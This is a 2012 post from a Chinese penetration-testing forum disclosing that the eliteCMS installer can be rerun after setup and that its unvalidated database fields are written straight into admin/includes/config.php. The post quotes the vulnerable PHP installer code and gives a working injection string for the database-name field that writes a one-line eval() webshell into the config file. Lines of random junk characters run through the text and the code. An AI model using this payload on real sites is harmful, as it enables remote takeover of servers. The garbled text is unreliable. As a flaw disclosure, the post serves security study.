中国网络渗透测试联盟
标题:
eliteCMS安装文件未验证 + 一句话写入安全漏洞
[打印本页]
作者:
admin
时间:
2012-11-18 13:59
标题:
eliteCMS安装文件未验证 + 一句话写入安全漏洞
eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
" ~, K% g0 m g# J7 H3 \, B
8 r1 T/ `0 P* R" J3 D
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
8 H4 q( [- P/ {) d$ R. U: @
我们来看代码:
' d* `. E# _- E9 P- a9 J! V9 @5 n6 J
! ?& G, t: X; o" z+ o A
...
2 x- R: B8 h$ d. U% ]/ `# n
elseif ($_GET['step'] == "4") {
! V6 L: T+ y4 |0 d& B, ~5 s
$file = "../admin/includes/config.php";
Z5 O! n3 b/ m2 ~8 n
$write = "<?php\n";
3 P" }/ ]7 Q8 T6 l" z7 g$ d
$write .= "/**\n";
" |, F# s1 p8 c+ }& A2 Z
$write .= "*\n";
8 w9 T9 g$ V" N) E2 M) K3 x
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
* f$ n9 V5 j3 k. u7 L
...略...
8 p2 h) B4 v* |: z4 O. J
$write .= "*\n";
* K' K& ?' y. n; k/ L
$write .= "*/\n";
) D& ~" l0 k2 W: K( J
$write .= "\n";
9 f% u+ m2 H9 n* n# e
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
$ {/ q8 l. w" _* z
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
' d; g4 O7 {% J( q' u6 Q. y
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
* o7 k' C! W+ r! {, w% G
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
1 `6 o( }0 w C1 y. P" Q* ~
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
" v7 G- Z' P4 `
$write .= "if (!\$connection) {\n";
; v8 Z7 m$ x( T% I9 P/ y9 j
$write .= " die(\"Database connection failed\" .mysql_error());\n";
$ i* R' A, x6 A1 x& ~5 Y
$write .= " \n";
' i- \8 t5 G/ V% T
$write .= "} \n";
6 D) P0 X. i" G
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
% B4 B. i2 r8 c3 m
$write .= "if (!\$db_select) {\n";
1 L4 t& S- r& }9 ?- G+ K
$write .= " die(\"Database select failed\" .mysql_error());\n";
6 `; C' J" A% w8 x; K
$write .= " \n";
- Y7 F l5 p) B' W/ L
$write .= "} \n";
* o! k E: R1 S k5 j3 u3 g
$write .= "?>\n";
/ o( N: ?5 c6 a+ z+ N
$ C, z! C- N/ ^
$writer = fopen($file, 'w');
+ `9 \8 J8 S# j7 ^5 q) g
...
9 {8 p! V+ ]2 r B) n7 o& G: ^4 t j
( M k# q9 t& F5 _
在看代码:
9 W! ?& ~; v, g# D o: `( c. k1 j8 o
( z( f$ k! q* X7 R
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
( p# W$ u |3 F: ?/ }) S1 V
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
: v R4 j4 C9 N
$_SESSION['DB_USER'] = $_POST['DB_USER'];
2 ~6 y5 P: u( B* ^
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
, I. r6 M* A! A( e5 B$ R. G
4 o( P3 m! V6 N$ g% D
取值未作任何验证
) o% I% v0 N6 P. u4 f+ t
如果将数据库名POST数据:
2 G1 N# l" m- c ?
o! x; w) H) ?% T6 \/ ~' v
"?><?php eval($_POST[c]);?><?php
6 H3 A' Q7 P5 j! Y7 s n9 b: v
/ N: M- ?1 @0 Y p7 {" K
将导致一句话后门写入/admin/includes/config.php
) w* b. \' a* E% x
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2